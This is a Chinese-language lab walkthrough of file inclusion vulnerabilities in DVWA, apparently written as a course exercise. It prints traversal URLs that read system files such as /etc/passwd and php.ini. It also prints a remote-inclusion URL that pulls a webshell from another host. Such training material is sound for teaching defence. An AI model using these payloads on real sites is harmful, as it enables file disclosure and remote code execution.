E055-web安全应用-File Inclusion文件包含漏洞初级

孪生质数-2023-10-18 18:33

课程名称:

E055-web安全应用-File Inclusion文件包含漏洞初级

课程分类:

web安全应用

实验等级:

中级

任务场景:

【任务场景】

小王接到磐石公司的邀请,对该公司旗下网站进行安全检测,经过一番检查发现了该论坛的某个页面存在文件包含漏洞。反复测试后,小王总结了一下网站文件包含漏洞,为了让公司管理人员彻底的理解并修补漏洞,小王用DVWA情景再现。

任务分析:

【任务分析】

网站服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件。

预备知识:

【预备知识】

PHP文件包含漏洞,就是在通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致包含了Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码

当服务器的php配置中,选项allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件,如果对文件来源没有检查的话,就容易导致任意远程代码执行。

str_replace函数,能够对参数进行了一定的处理,将"http:// "、"https://"、 " ../"、"..\"替换为空字符,即删除。

任务实施:

E055-web安全应用-File Inclusion文件包含漏洞初级

服务器场景:p9_win7-1(用户名:test;密码:123456)

服务器场景操作系统:Windows 7

服务器场景:p9_ws03-1(用户名:administrator;密码:123456)

服务器场景操作系统:Microsoft Windows2003 Server

网络结构拓扑:

实战复现:

打开火狐浏览器,在地址栏输入靶机的地址访问网页,使用默认用户名admin密码password登录:

点击"File Inclusion"后选择"file1.php"

构建本地包含url

" http://172.16.1.4/vulnerabilities/fi/?page=/etc/passwd"

复制代码 
" http://172.16.1.4/vulnerabilities/fi/?page=/etc/passwd"

报错,显示没有这个文件,说明服务器系统不是Linux,但同时暴露了服务器根目录文件的绝对路径C:\phpstudy\WWW\

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

构建绝对路径

http://172.16.1.4/vulnerabilities/fi/?page=C:\\phpstudy\\WWW\\php.ini成功显示php.ini的内容

复制代码 
http://172.16.1.4/vulnerabilities/fi/?page=C:\phpstudy\WWW\php.ini

构建相对路径

加这么多..\是为了保证到达服务器的C盘根目录,可以看到读取是成功的

远程文件包含

服务器的php配置中,选项allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件,如果对文件来源没有检查的话,就容易导致任意远程代码执行

第一步,在本地搭建一个可访问的网站并写好一句话木马

构造url

172.16.1.4/vulnerabilities/fi/?page=http://172.16.1.5/muma.php

复制代码 
172.16.1.4/vulnerabilities/fi/?page=http://172.16.1.5/muma.php

成功的访问了目标网站

本地文件包含

第一步:构建绝对路径url 构建绝对路径

http://172.16.1.4/vulnerabilities/fi/?page=C:\\phpstudy\\WWW\\php.ini。成功显示php.ini内容

复制代码 
http://172.16.1.4/vulnerabilities/fi/?page=C:\phpstudy\WWW\php.ini

构建相对路径url

172.16.1.4/vulnerabilities/fi/?page=..\..\..\..\..\..\..\..\..\phpstudy\WWW\php.ini

复制代码 
172.16.1.4/vulnerabilities/fi/?page=..\..\..\..\..\..\..\..\..\phpstudy\WWW\php.ini

构造url

172.16.1.4/vulnerabilities/fi/?page=http://172.16.1.5/muma.php未能访问成功

复制代码 
172.16.1.4/vulnerabilities/fi/?page=http://172.16.1.5/muma.php

点击"view_source"查看源代码,可以看到,Medium级别的代码增加了str_replace函数,对page参数进行了一定的处理,将"http:// "、"https://"、 " ../"、"..\"替换为空字符,即删除

重新构建url链接,发现成功访问

实验结束,关闭虚拟机。

相关推荐
超浪的晨1 分钟前
JavaWeb 入门:HTML 基础与实战详解(Java 开发者视角)
java·开发语言·前端·后端·html·个人开发
辉盈防爆散热风扇3 小时前
EC 技术赋能:福佑防爆风扇如何平衡安全与节能?
安全
m0_747266096 小时前
代码审计与web安全选择题1
网络安全
君鼎8 小时前
安全逆向工程学习路线
安全·逆向·网安
清 晨9 小时前
剖析 Web3 与传统网络模型的安全框架
网络·安全·web3·facebook·tiktok·instagram·clonbrowser
编程到天明11 小时前
CTF-Web题解:“require_once(‘flag.php‘); &assert(“$i == $u“);”
网络安全·php
Johny_Zhao11 小时前
CentOS Stream 9上部署FTP应用服务的两种方法(传统安装和docker-compose)
linux·网络安全·信息安全·kubernetes·云计算·containerd·ftp·yum源·系统运维
jonyleek11 小时前
如何搭建一套安全的,企业级本地AI专属知识库系统?从安装系统到构建知识体系,全流程!
人工智能·安全
还是奇怪12 小时前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell
sql·安全·web安全
前端Hardy14 小时前
HTML&CSS:惊艳!科技感爆棚的登录页面代码解析
前端·javascript·html
热门推荐
01Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code02Coze 开源了,送上保姆级私有化部署方案【建议收藏】03扣子开源本地部署教程 丨Coze智能体小白喂饭级指南04全球最强模型Grok4,国内已可免费使用!(附教程)05KGG转MP3工具|非KGM文件|解密音频06腾讯还是太全面了,限时免费!超全CodeBuddy IDE保姆级教程!(附案例)0701-开源版COZE-字节 Coze Studio 重磅开源!保姆级本地安装教程,手把手带你体验08vue数据变化但页面不变09干翻 Typora!MilkUp:完全免费的桌面端 Markdown 编辑器!10【2025.7.18】更新vscode后所有.vue文件template标签后报红的临时解决办法,Vue - Official 插件3.0.2导致